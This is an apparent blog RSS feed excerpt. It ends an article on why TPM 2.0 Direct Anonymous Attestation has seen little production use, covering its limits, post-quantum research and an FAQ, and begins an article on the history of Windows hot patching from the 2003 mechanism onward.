&lt;p&gt;This is the third aha. The reader entered §9 believing that cryptographic superiority should eventually win in production, and that Microsoft&apos;s non-adoption of DAA must be an oversight or a missed product opportunity. They exit understanding that the deployment-economics asymmetry is structural: a broker-mediated attestation flow reduces, end-to-end, to standard X.509 plumbing every cloud SDK already ships, while a DAA-mediated flow requires bespoke verifier libraries, bespoke revocation infrastructure, bespoke debugging tooling, and bespoke incident-response runbooks. Cloud-platform organizations have spent the last ten years building world-class operational machinery for X.509 attestation. They will not throw it away for a cryptographic property no compliance regime currently demands.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The four reasons compound. The broker model gives a single audit point, a database-delete revocation primitive, an SDK that ships in every major language, and a debugging story the on-call engineer can walk through at 3 a.m. DAA gives mathematical privacy and requires every one of those operational properties to be rebuilt from scratch. Cloud platforms have, repeatedly and consistently, picked the architecture whose operational properties are easier to ship -- not because they do not understand the cryptographic alternative, but because the cryptographic alternative would require them to discard the operational machinery they already have. This is the structural reason DAA has stayed in firmware on a billion chips and out of production attestation flows on all of them.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the broker calculus is this durable, is there any future world in which DAA wins? Two, and both are research-stage with decade-long horizons.&lt;/p&gt;
&lt;h2&gt;10. Theoretical Limits and Open Problems&lt;/h2&gt;
&lt;p&gt;What can DAA never do? Where does the next decade of research go? Three open problems organize the active research community in 2026.&lt;/p&gt;
&lt;h3&gt;10.1 What DAA cannot do&lt;/h3&gt;
&lt;p&gt;The first honest statement is the negative one. A correctly implemented DAA scheme does not prevent a &lt;em&gt;compromised TPM&lt;/em&gt; from signing for the cohort it belongs to. The EK certificate attestation must be honest at manufacture time; if a TPM&apos;s secret membership value &lt;code&gt;f&lt;/code&gt; leaks to an attacker (through fault injection, through side-channel extraction, through a firmware backdoor), the attacker can produce ECDAA signatures indistinguishable from legitimate ones until the TPM&apos;s &lt;code&gt;f&lt;/code&gt; is added to a revocation list. The same constraint applies to every group-signature scheme.&lt;/p&gt;
&lt;p&gt;A second hard limit is per-basename linkability. The user-controlled-linkability property gives a TPM the choice of linkable or unlinkable signing -- but once a verifier has seen the pseudonym &lt;code&gt;N_V = ζ^f mod Γ&lt;/code&gt; for a particular &lt;code&gt;(TPM, bsn)&lt;/code&gt; pair, the linkage for that basename is permanent. A misbehaving TPM that wants its history with a particular relying party forgotten cannot, by signing under a different basename, retroactively unlink past sessions.&lt;/p&gt;
&lt;p&gt;A third limit is rogue-key scalability. The TPM 2.0 ECDAA scheme detects rogue keys by checking each signature against a list of compromised-&lt;code&gt;f&lt;/code&gt; values the verifier maintains. For small lists this is cheap. For very large lists -- imagine a deployment where 1% of the chip population leaks &lt;code&gt;f&lt;/code&gt; to attackers and the verifier must check every signature against ten million revoked values -- the constant factor matters. EPID&apos;s Sig-RL mechanism uses signature-based revocation that scales better; the TPM 2.0 ECDAA scheme does not include it.&lt;/p&gt;
&lt;h3&gt;10.2 The One-TPM-to-Bind-Them-All fix&lt;/h3&gt;
&lt;p&gt;In 2017 a team consisting of Jan Camenisch, Liqun Chen, Manu Drijvers, Anja Lehmann, David Novick, and Rainer Urian published &quot;One TPM to Bind Them All: Fixing TPM 2.0 for Provably Secure Anonymous Attestation&quot; at IEEE S&amp;amp;P 2017 [@one-tpm-2017]. The paper demonstrated a Diffie-Hellman-oracle attack against the TPM 2.0 ECDAA interface as shipped: a malicious host could query the TPM in a way that gave the host a DH-oracle relative to the TPM&apos;s secret &lt;code&gt;f&lt;/code&gt;, effectively breaking the unlinkability property. The proposed fix had been published the previous year by Camenisch, Drijvers, and Lehmann at TRUST 2016 [@cdl-2016] [@cdl-2016-eprint]; library implementations of DAA published from 2017 onward incorporate the fix.The CDL16 fix is library-level, not silicon-level. The TPM 2.0 ECDAA command surface in the chip remains as shipped; the &lt;em&gt;software&lt;/em&gt; that drives it must use the corrected protocol sequence to avoid presenting the host-controlled DH oracle. As of late 2025, the TCG normative TPM 2.0 Library Specification text has not been amended to require the corrected sequence. Implementations of DAA on top of TPM 2.0 -- the FIDO ECDAA v2.0 library, the Camenisch-Drijvers-Lehmann reference code, modern academic ECDAA implementations -- follow CDL16. Implementations written against the bare TPM 2.0 Library Specification without reading CDL16 are vulnerable.&lt;/p&gt;
&lt;h3&gt;10.3 Post-quantum DAA&lt;/h3&gt;
&lt;p&gt;Shor&apos;s algorithm is fatal to DAA. Every classical DAA construction -- BCC 2004, BCL 2008, CPS 2010, CDL 2016 -- relies on the hardness of discrete logarithms in elliptic-curve groups, the hardness of strong-RSA factoring, or both. A cryptographically relevant quantum computer breaks all of them. &lt;a href=&quot;https://paragmali.com/blog/post-quantum-cryptography-on-windows-the-thirty-year-migrati/&quot; rel=&quot;noopener&quot;&gt;Post-quantum&lt;/a&gt; DAA is therefore active research, with no production deployment as of 2026. Three candidate families are being actively explored:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Symmetric-primitive DAA.&lt;/strong&gt; Dan Boneh, Saba Eskandarian, and Ben Fisch presented &quot;Post-quantum EPID Signatures from Symmetric Primitives&quot; at CT-RSA 2019 [@bef-2019], building a post-quantum group signature from one-way functions and Merkle trees. The construction has classical post-quantum security guarantees but pays a steep size cost.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lattice-based DAA.&lt;/strong&gt; Rachid El Bansarkhani and Ali El Kaafarani published &quot;Direct Anonymous Attestation from Lattices&quot; as IACR ePrint 2017/1022 [@bk-2017-eprint], the earliest such proposal in the literature. The state-of-the-art lattice DAA construction is the 2024 Collaborative Segregated NIZK (&quot;CoSNIZK&quot;) work by Liqun Chen, Patrick Hough, and Nada El Kassem [@cosnizk-2024], achieving signatures of approximately 38 kilobytes -- an order of magnitude smaller than the earliest lattice proposals but still two orders of magnitude larger than CPS 2010 ECDAA.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hash-based DAA.&lt;/strong&gt; Liqun Chen, Changyu Dong, Nada El Kassem, Christopher Newton, and Yalan Wang published &quot;Hash-Based Direct Anonymous Attestation&quot; at PQCrypto 2023 [@hashdaa-2023], building DAA from SPHINCS+-style stateless hash-based signatures. Size and speed remain unfavorable for TPM 2.0 firmware budgets.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The blocker for any of these reaching production TPM firmware is not academic. The TPM 2.0 normative algorithm set does not include lattice primitives. A post-quantum DAA in TPM 2.0 would require introducing &lt;code&gt;TPM_ALG_DILITHIUM&lt;/code&gt;, &lt;code&gt;TPM_ALG_FALCON&lt;/code&gt;, &lt;code&gt;TPM_ALG_KYBER&lt;/code&gt;, or some equivalent into the spec, mandating support in the PC Client Platform TPM Profile, and rolling out across the OEM TPM-vendor base. That is, at minimum, a three-to-five-year standards effort that the TCG has not, as of late 2025, publicly committed to. CoSNIZK at 38 kilobytes is also two to three times larger than the largest signature any deployed TPM 2.0 firmware budgets for; the TPM-side compute time at quantum-safe parameter sets is currently measured in seconds rather than tens of milliseconds.&lt;/p&gt;
&lt;h3&gt;10.4 DAA for confidential computing&lt;/h3&gt;
&lt;p&gt;The other future-world thread is confidential computing -- the family of CPU-anchored isolated-execution primitives (Intel SGX, Intel TDX, AMD SEV-SNP, ARM CCA) that need their own attestation surfaces. Intel SGX attestation initially used EPID and has since migrated to DCAP, a vendor-CA broker similar in shape to Microsoft Azure Attestation. AMD SEV-SNP and Intel TDX use vendor-rooted PKI from the start.&lt;/p&gt;
&lt;p&gt;Whether DAA-style group-signature schemes are appropriate for VM-level attestation -- where cohorts are small (per-region TDX hosts in a given hyperscaler datacenter), where the verifier is often a small set of well-known cloud-platform endpoints, and where traffic-analysis leakage between confidential VMs and Privacy-CA-like services is itself a threat -- is an open architectural question. The 2026 default is &quot;vendor-CA broker&quot;; the academic community continues to argue that cryptographic DAA would be a better match for the threat model. Production has not, so far, agreed.&lt;/p&gt;
&lt;p&gt;A note on Java Card DAA prototypes. A small number of academic implementations of DAA on Java Card secure elements appeared between 2014 and 2017 -- Camenisch and others published smartcard-class implementations as proofs of concept. None reached production deployment. The reasons appear to be the same operational-economics asymmetry that limits TPM 2.0 ECDAA adoption: Java Card environments lack the relying-party verifier libraries that would consume the output. This is inference; no Java Card vendor has, to public knowledge, published a &quot;we evaluated DAA and chose not to ship it&quot; statement.&lt;/p&gt;
&lt;p&gt;These are the open problems for researchers. What about the rest of us, on Monday morning?&lt;/p&gt;
&lt;h2&gt;11. Practical Guide and Frequently Asked Questions&lt;/h2&gt;
&lt;p&gt;Five roles, one Monday morning. Where does this leave you?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;For a Windows platform engineer.&lt;/strong&gt; The minimum viable Windows DAA API surface is approximately a &lt;code&gt;BCryptCreateDaaContext&lt;/code&gt;, &lt;code&gt;BCryptDaaJoin&lt;/code&gt;, &lt;code&gt;BCryptDaaSign&lt;/code&gt;, and &lt;code&gt;BCryptDaaVerify&lt;/code&gt; set, plus an &lt;code&gt;NCryptDaaKeyHandle&lt;/code&gt; for key-storage-provider lifecycle, plus a Web Authentication API surface that consumes ECDAA attestation. Shipping all of that costs a Hello-sized engineering investment. If Pluton&apos;s published surface ever advertises ECDAA, an OEM-side integration becomes possible. Today the answer is that DAA is not available through any supported Windows API.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;For an attestation-provider product engineer.&lt;/strong&gt; Pick a Privacy-CA broker architecture for production. The comparison table below makes the trade-offs explicit. Cryptographic DAA does not pay for the architectural switch unless the relying-party privacy threat is specifically the broker itself -- a threat model that, in 2026, no shipping production attestation product publicly assumes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;For a FIDO authenticator vendor.&lt;/strong&gt; ECDAA attestation is not a viable production choice in 2026. The path to it becoming viable runs through verifier libraries in Chromium, Firefox, and Safari; relying-party SDK support across Auth0, Okta, Microsoft Entra, and Google Identity Platform; and a non-deprecated WebAuthn Level N specification that re-adds the format. None of those preconditions are visibly in progress.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;For an academic zero-knowledge-proof researcher.&lt;/strong&gt; Four open problems map onto production needs: post-quantum DAA at TPM-firmware-shippable signature sizes (the current state-of-the-art at 38 kilobytes is too large), threshold-issuer DAA (no single party can issue a credential), confidential-computing DAA (for small-cohort VM attestation), and IoT DAA (for milliwatt-class energy budgets). Each is publishable; none yet has a deployment path.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;For a privacy-tech advocate or policymaker.&lt;/strong&gt; The framing that helps Microsoft, Google, and AWS engineering teams hear the request is &quot;the broker can be compelled by a subpoena; the math cannot.&quot; The framing that does not help is &quot;your cryptography is worse than the academic alternative.&quot; The first is a threat-model conversation that engineering organizations can engage with; the second is a technology conversation they have already had and decided.&lt;/p&gt;
&lt;h3&gt;Comparison: four production architectures for attested privacy&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Privacy-CA broker&lt;/th&gt;
&lt;th&gt;TPM 2.0 ECDAA&lt;/th&gt;
&lt;th&gt;EPID 2.0&lt;/th&gt;
&lt;th&gt;Vendor-CA (Apple, AWS Nitro, Google)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Trust assumption&lt;/td&gt;
&lt;td&gt;Operational (CA promises not to log)&lt;/td&gt;
&lt;td&gt;Cryptographic (issuer cannot link)&lt;/td&gt;
&lt;td&gt;Cryptographic (issuer cannot link)&lt;/td&gt;
&lt;td&gt;Operational (vendor CA promises not to log)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Anonymity from verifier?&lt;/td&gt;
&lt;td&gt;If CA does not log&lt;/td&gt;
&lt;td&gt;Yes (per-basename)&lt;/td&gt;
&lt;td&gt;Yes (per-basename)&lt;/td&gt;
&lt;td&gt;If vendor does not log&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TPM-side sign time&lt;/td&gt;
&lt;td&gt;Milliseconds (AIK signing)&lt;/td&gt;
&lt;td&gt;Tens of milliseconds&lt;/td&gt;
&lt;td&gt;Tens of milliseconds&lt;/td&gt;
&lt;td&gt;N/A (signing on vendor silicon)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Signature size&lt;/td&gt;
&lt;td&gt;Hundreds of bytes (AIK)&lt;/td&gt;
&lt;td&gt;Hundreds of bytes&lt;/td&gt;
&lt;td&gt;Hundreds of bytes&lt;/td&gt;
&lt;td&gt;Hundreds of bytes (X.509 over signed JWT)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Revocation&lt;/td&gt;
&lt;td&gt;Centralized (refuse / CRL / OCSP)&lt;/td&gt;
&lt;td&gt;Private-key list (TPM 2.0)&lt;/td&gt;
&lt;td&gt;Sig-RL (signature-based)&lt;/td&gt;
&lt;td&gt;Vendor revocation list&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Implementer complexity&lt;/td&gt;
&lt;td&gt;Low (X.509 PKI everywhere)&lt;/td&gt;
&lt;td&gt;High (BN-P256 pairing libraries)&lt;/td&gt;
&lt;td&gt;High (vendor SDK required)&lt;/td&gt;
&lt;td&gt;Low (vendor SDK ships it)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Standardization&lt;/td&gt;
&lt;td&gt;TCG (2003)&lt;/td&gt;
&lt;td&gt;TPM 2.0 + ISO 20008-2 Mech 4&lt;/td&gt;
&lt;td&gt;ISO 20008-2 Mech 4&lt;/td&gt;
&lt;td&gt;Vendor-proprietary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best suited for&lt;/td&gt;
&lt;td&gt;Cloud attestation at hyperscaler scale&lt;/td&gt;
&lt;td&gt;Hardware-anchored attestation where broker is the threat&lt;/td&gt;
&lt;td&gt;Intel-deployed enclave attestation&lt;/td&gt;
&lt;td&gt;Vendor-platform attestation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026 deployment scale&lt;/td&gt;
&lt;td&gt;Billions of attestations per day&lt;/td&gt;
&lt;td&gt;Essentially zero production verifiers&lt;/td&gt;
&lt;td&gt;2.4B+ EPID keys per RSAC 2016&lt;/td&gt;
&lt;td&gt;Billions of attestations per day&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The &quot;essentially zero production verifiers&quot; entry for TPM 2.0 ECDAA is the deployment story this article exists to explain. The cryptography is in firmware on hundreds of millions of devices; the verifier side, in 2026, is research-grade libraries and the FIDO ECDAA-Verify reference code. No production cloud-platform SDK ships an ECDAA verifier.&lt;/p&gt;

Four things, in order. First, Pluton&apos;s published surface advertises `TPM_ALG_ECDAA` and an Issuer key-management story (a Microsoft-operated DAA Issuer for Windows devices, with documented enrollment and revocation flows). Second, a Cryptography Next Generation API surface (`BCryptDaaSign`, `NCryptDaaKey*`) that exposes the TPM2_Commit / TPM2_Sign sequence behind a single managed-language call. Third, a Web Authentication API extension that surfaces ECDAA attestation as a first-class statement format the same way the `tpm` format is today. Fourth, an Azure Attestation policy mode that consumes ECDAA signatures and produces JWT outputs downstream Microsoft services already understand. None of these are technically blocking; all four require a multi-year roadmap commitment that, as of late 2025, Microsoft has not publicly made. This is a thought experiment about technical feasibility, not a forecast about Microsoft strategy.
&lt;p&gt;The companion piece to this article is the &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM in Windows&lt;/a&gt; article, which walks the broader TPM 2.0 command surface ECDAA sits inside.&lt;/p&gt;


It depends on what the laptop ships. The TPM 2.0 Library Specification names `TPM_ALG_ECDAA`. The TCG PC Client Platform TPM Profile made the algorithm optional in v1.04 (February 2020) and has carried that designation through v1.07 RC1 (December 2025), so a conformant Windows-class platform is allowed to omit it. Many discrete TPM 2.0 modules (Infineon, STMicroelectronics, Nuvoton) do implement the algorithm; Microsoft Pluton&apos;s published documentation does not advertise it. The honest answer is &quot;look at your specific TPM vendor&apos;s algorithm capability table&quot; -- and that even if your TPM does support the algorithm, Windows ships no API to use it [@tpm-library-spec] [@tcg-ptp] [@pluton] [@wiki-daa].


Microsoft has not published an explicit rationale. Four inferable reasons are visible from the architecture: (1) operational simplicity -- a hosted CA is easier to debug than a per-relying-party DAA verifier; (2) revocation economics -- a CA can revoke an AIK by deleting a certificate, while DAA revocation requires a private-key list distributed to every verifier; (3) a missing relying-party verifier-library stack; (4) no Windows API surface for ECDAA. All four are inferences. The shipped architecture is the Privacy-CA-shaped flow documented at the Microsoft Learn attestation page [@azure-attestation].


WebAuthn Level 1 (March 2019) registered ECDAA as an attestation *type* (Basic, Self, AttCA, ECDAA, None) carried inside the `packed` and `tpm` attestation statement formats. The Level 1 specification text contains 63 references to &quot;ecdaa.&quot; WebAuthn Level 2 (April 2021) removed the type entirely; an independent grep of the Level 2 Recommendation HTML returns zero occurrences of &quot;ecdaa.&quot; The Yubico migration guide for its WebAuthn server library states verbatim that &quot;this attestation type was removed from WebAuthn Level 2&quot; and that &quot;ECDAA support has not been implemented in this library.&quot; The format has not been resurrected as of 2026 [@webauthn-1] [@webauthn-2] [@yubico-migration].


EPID is a DAA variant with one cryptographic addition: signature-based revocation (Sig-RL), which lets a verifier prove that a candidate signature was not produced by the same signer as any signature on a revocation list. The TPM 2.0 ECDAA scheme is the Chen-Page-Smart 2010 construction; EPID 2.0 is essentially the same construction with Sig-RL added. Intel positions EPID separately because of its production deployment (2.4 billion-plus keys shipped per Intel&apos;s RSAC 2016 disclosure, used for SGX attestation, Widevine, and several Intel chipsets), its specific licensing structure (royalty-free under Intel&apos;s contribution to ISO/IEC 20008 / 20009), and its open-source SDK that Intel maintained until archiving in 2023 [@brickell-li-epid-2007] [@brickell-li-tdsc-2012] [@wiki-epid] [@epid-sdk].


Active research, no production deployment as of 2026. The leading constructions are lattice-based (CoSNIZK 2024 at approximately 38 kilobytes per signature [@cosnizk-2024]), hash-based (the 2023 PQCrypto paper from SPHINCS+ [@hashdaa-2023]), and symmetric-primitive-based (Boneh-Eskandarian-Fisch CT-RSA 2019 [@bef-2019]). The barriers to shipping any of them in a TPM are fundamental: TPM 2.0 firmware does not implement lattice primitives, signature sizes at 30+ kilobytes are incompatible with current attestation-latency budgets, and no relying-party verifier library exists. A post-quantum DAA TPM is a 2030s project at the earliest.


No. The Stage 0a focus-premise audit of this article demoted that framing as not supported by evidence. The accurate claim is &quot;standardized in the TPM 2.0 Library Specification (2014); optional in the TCG PC Client Platform TPM Profile since February 2020; present on many discrete TPMs (vendor documentation confirms); absent from Microsoft Pluton&apos;s published algorithm surface; supported by no Windows API.&quot; That hedged statement is the one the article carries from its first 200 words through to this FAQ [@tpm-library-spec] [@tcg-ptp] [@pluton].

&lt;p&gt;The cryptography is finished. The standardization is finished. The hardware is in the field. What is missing is the social machinery -- the verifier libraries, the SDK presence, the operational tooling, the incident-response runbooks, the regulator demand -- that turns cryptography into deployment. Direct Anonymous Attestation is the cleanest example in platform security of a primitive that won every standardization fight and lost every deployment one. The lesson is not that the cryptography is wrong. The lesson is that cryptography is necessary but never sufficient. Production systems are social systems whose mathematical components, however elegant, must compete with operational alternatives whose properties are easier to ship.&lt;/p&gt;
&lt;p&gt;The companion pieces in this series are &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;The TPM in Windows&lt;/a&gt; (the cryptographic primitive plumbing TPM 2.0 ECDAA sits inside) and the Microsoft Pluton continuation article (Pluton&apos;s published capability surface and the negative claim this article rests its §9 hedge on). The Measured Boot piece -- forthcoming -- walks the data that a hypothetical DAA quote would attest. If those three articles arrive together, the picture of Windows attestation as a &lt;em&gt;system&lt;/em&gt; rather than a primitive becomes complete.&lt;/p&gt;
</content:encoded><category>tpm</category><category>attestation</category><category>zero-knowledge-proofs</category><category>cryptography</category><category>windows-security</category><category>pluton</category><category>webauthn</category><category>fido</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>From /hotpatch to \$1.50 a Core: The Live-Patch Pipeline Microsoft Built and Then Made Public</title><link>https://paragmali.com/blog/from-hotpatch-to-150-a-core-the-live-patch-pipeline-microsof/</link><guid isPermaLink="true">https://paragmali.com/blog/from-hotpatch-to-150-a-core-the-live-patch-pipeline-microsof/</guid><description>How Windows hot patching evolved from a 1990s compiler flag to a Secure-Kernel-mediated, three-layer pipeline shipping in three product waves between 2022 and 2025.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Windows hot patching is a three-layer pipeline, not a feature.** A kernel mechanism rewrites a process&apos;s `.text` in place, directed by HPAT metadata baked into every patchable PE and brokered by the Secure Kernel. A servicing model ships one Cumulative Update per quarter and two hot-patch-only months between baselines. A management plane (Azure Update Manager, Intune Autopatch, or Azure Arc) selects eligible fleets and falls back to the regular reboot path for everything else.&lt;p&gt;The mechanism has been running on the Azure host fleet for years [@ms-techcommunity-hotpatch-nov2021] before Microsoft turned it into a product. The public products arrived in three waves: Windows Server 2022 Datacenter: Azure Edition [@techcommunity-server2022-ga-feb2022] (February 16, 2022, free on Azure), Windows 11 Enterprise 24H2 [@ms-techcommunity-hotpatch-client-apr2025] (April 2, 2025, license-gated via Intune Autopatch), and Windows Server 2025 outside Azure [@ms-blog-server2025-hotpatch] (July 1, 2025, $1.50 USD per CPU core per month over Azure Arc). The architectural innovation -- the part that separates the modern design from Microsoft&apos;s failed 2003 attempt and from Linux&apos;s ftrace-based &lt;code&gt;livepatch&lt;/code&gt; -- is the trust anchor. The Secure Kernel verifies signed patch payloads and performs the rewrite under HVCI. Static-data-layout changes still force a reboot, and they always will. That is not an engineering shortcoming. It is a corollary of Rice&apos;s theorem.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h2&gt;1. The hook: a $1.50-per-core-per-month reboot bill&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s Visual C++ compiler ships a &lt;code&gt;/hotpatch&lt;/code&gt; switch. The flag is small, almost forgettable: when set, the compiler guarantees that the first instruction of every function is at least two bytes long and that no jump within the function targets the prologue [@ms-cpp-hotpatch]. Those two bytes are the enabling primitive for everything that follows in this article. They are the place where a running operating system can be quietly amended without being stopped.&lt;/p&gt;
&lt;p&gt;On July 1, 2025, Microsoft began charging $1.50 USD per CPU core per month for the right to use that primitive on Windows Server 2025 outside Azure [@ms-blog-server2025-hotpatch]. The 26 years in between are the subject of this article.&lt;/p&gt;

The replacement of executable code inside a running process or kernel without first stopping the program. Microsoft uses the term as an umbrella for the *mechanism* (in-memory binary rewriting), the *delivery pipeline* (signed payloads, servicing cadence), and the *operational plane* (which fleets are eligible and how rollout is staged). Linux uses *livepatch* (in-tree) and *kpatch* / *kGraft* / *Ksplice* (out-of-tree or vendor) for closely related but mechanically distinct primitives. The shared goal is to apply security fixes without paying the downtime cost of a reboot.
&lt;p&gt;The shock of a metered subscription on a 30-year-old compiler feature is the question this article exists to answer. Three current Windows hot-patch products run on top of a single internal engineering pipeline:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Windows Server 2022 Datacenter: Azure Edition&lt;/strong&gt;, GA on February 16, 2022, free for Azure VMs [@techcommunity-server2022-ga-feb2022]. The first public surface of the modern pipeline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Windows 11 Enterprise 24H2 client&lt;/strong&gt;, GA on April 2, 2025 [@ms-techcommunity-hotpatch-client-apr2025], license-gated through Intune Autopatch.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Windows Server 2025&lt;/strong&gt;, GA on July 1, 2025 over Azure Arc at $1.50 USD per CPU core per month [@ms-blog-server2025-hotpatch] for on-premises and multi-cloud machines, with the reboot frequency reduced from 12 times a year to 4 [@ms-blog-server2025-hotpatch].&lt;/li&gt;
&lt;/ul&gt;

Hotpatching is an impact-less update technology which has been keeping the Azure fleet up-to-date for years with zero impact on customer workloads. -- Microsoft&apos;s Windows OS Platform team, November 2021 [@ms-techcommunity-hotpatch-nov2021]
&lt;p&gt;That single sentence is the load-bearing claim. The customer-facing product launched in February 2022 was not a research result. It was the externalization of an internal pipeline that had been quietly servicing Azure for years. The 2022, 2025, and 2025 GA dates are the points at which Microsoft turned the same engineering machine outward, one customer surface at a time.&lt;/p&gt;

At Build 2025, Mark Russinovich presented hot patching alongside two other Azure availability primitives [@ms-research-build2025-russinovich]: VMPHU (Virtual Machine Preserving Host Update), which patches the host while preserving running guests through the host reboot, and Kernel Soft Reboot, which is a fast in-place kernel transition that skips firmware. These are not the same thing. VMPHU is host-side. Kernel Soft Reboot still costs a kernel transition. Hot patching is the only one that rewrites code in flight on the running guest. Conflating the three is the second-most-common mistake in this space.
&lt;p&gt;So the question. Microsoft did not invent in-memory function replacement on Windows in 2022. Microsoft &lt;em&gt;shipped&lt;/em&gt; it in 2003. Why did it take 17 years to come back? The answer threads through a failed first attempt, a state-aligned APT, the entire Linux live-patching family tree, and an architectural change that did not exist when the original mechanism was designed. The compiler flag does not change. Everything around it does.&lt;/p&gt;
&lt;h2&gt;2. The 2003 original: Server 2003 SP1 hotpatching and why it mattered&lt;/h2&gt;
&lt;p&gt;In May 2011, a German systems engineer named Johannes Passing sat down with a Server 2003 kernel and a debugger and reverse-engineered, function by function, how an MS06-030 hot patch landed in memory. His walkthrough [@jpassing-hotpatching] is one of the cleanest contemporaneous records of a Microsoft feature that nearly nobody used. The trace looks like this, copied verbatim from his debugger session:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;nt!MmLoadSystemImage
nt!MmHotPatchRoutine+0x59
nt!ExApplyCodePatch+0x191
nt!NtSetSystemInformation+0xa1e
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;NtSetSystemInformation&lt;/code&gt;, with the magic class &lt;code&gt;SystemHotpatchInformation&lt;/code&gt;, dispatched into &lt;code&gt;ExApplyCodePatch&lt;/code&gt;, which called &lt;code&gt;MmHotPatchRoutine&lt;/code&gt;, which finally called &lt;code&gt;MiPerformHotPatch&lt;/code&gt; to walk the patch image&apos;s metadata and rewrite the target driver&apos;s instructions. The example Passing followed targeted &lt;code&gt;mrxsmb.sys&lt;/code&gt; and &lt;code&gt;rdbss.sys&lt;/code&gt; for the SMB bug that MS06-030 fixed. The patch worked. It worked in production. And almost nobody ever shipped one.&lt;/p&gt;
&lt;p&gt;The enabling primitive is the compiler flag from §1. The MSVC documentation states the contract: when &lt;code&gt;/hotpatch&lt;/code&gt; is used at compile time, every function begins with an at-least-two-byte first instruction with no internal jumps to it [@ms-cpp-hotpatch]. The x86 convention that fell out of this was the famous &lt;code&gt;mov edi, edi&lt;/code&gt; instruction at the start of every Windows function [@oldnewthing-mov-edi-edi] -- a 2-byte NOP-equivalent that, per Raymond Chen&apos;s verbatim Microsoft DevBlogs description, can be replaced with a two-byte &lt;code&gt;JMP $-5&lt;/code&gt; instruction to redirect control to five bytes of patch space that comes immediately before the start of the function [@oldnewthing-mov-edi-edi] without ever being read in a half-modified state.The &lt;code&gt;mov edi, edi&lt;/code&gt; instruction is itself an artifact. On x86 it is the compiler&apos;s chosen 2-byte placeholder; on x64 and Arm64 the compiler guarantees the hotpatchable prologue without an explicit placeholder instruction [@ms-cpp-hotpatch], because those architectures&apos; calling conventions and alignment requirements give the linker more freedom. The fossil-like sequence survives in x86 code today as a quiet reminder that every Windows function used to be hotpatchable by construction.&lt;/p&gt;
&lt;p&gt;The 2003 design paired this prologue convention with a payload format and a delivery syscall. The OpenRCE community published the format details in 2006 [@openrce-patching-internals]: the hot-patch image was a normal PE module with a section called &lt;code&gt;.hotp1&lt;/code&gt;, at least 80 bytes long, beginning with a &lt;code&gt;HOTPATCH_HEADER&lt;/code&gt; followed by a relocation-and-replacement table. On kernel-mode targets, &lt;code&gt;MmHotPatchRoutine&lt;/code&gt; walked the headers and rewrote the live &lt;code&gt;.text&lt;/code&gt;. On user-mode targets, an updating agent enumerated the running processes and injected a remote thread into each one [@openrce-patching-internals] to perform the equivalent rewrite. The mechanism shipped in Server 2003 SP1 and was available on XP SP2 across x86, IA-64, and x64.Primary sources disagree on the service-pack attribution: the OpenRCE 2006 writeup [@openrce-patching-internals] labels availability as &quot;Server 2003 SP0, XP SP2 x86, ia64, x64,&quot; while Johannes Passing&apos;s 2011 walkthrough [@jpassing-hotpatching] and Microsoft&apos;s 2016 MMPC blog both say &quot;Server 2003 SP1.&quot; The article picks the Microsoft-leaning side; the OpenRCE attribution remains in tension.&lt;/p&gt;
&lt;p&gt;It also never really shipped. The Server 2003 hotpatch engine was a credible developer feature that did not become an operational habit. A handful of advisories ever produced a &lt;code&gt;.hotp1&lt;/code&gt; payload; the feature was quietly retired by Windows 8. Why? Three structural reasons -- and a fourth that did not become visible until 2016.&lt;/p&gt;

Microsoft&apos;s pre-cumulative-update servicing model split each Windows binary into two parallel build streams: GDR (General Distribution Release), which carried only the security fixes shipped publicly, and QFE (Quick Fix Engineering), which carried the union of every per-customer hotfix Microsoft had issued. A 2003-era hot patch had to apply cleanly to *both* branches because customers were on different branches. Producing the patch was double the work, and the work duplicated everything that was already going into GDR. The cumulative-update model that replaced GDR/QFE in 2016 is one of the precise preconditions that made the modern hot-patch pipeline economical.
&lt;p&gt;So the four failures of the 2003 design:&lt;/p&gt;
&lt;ol&gt;
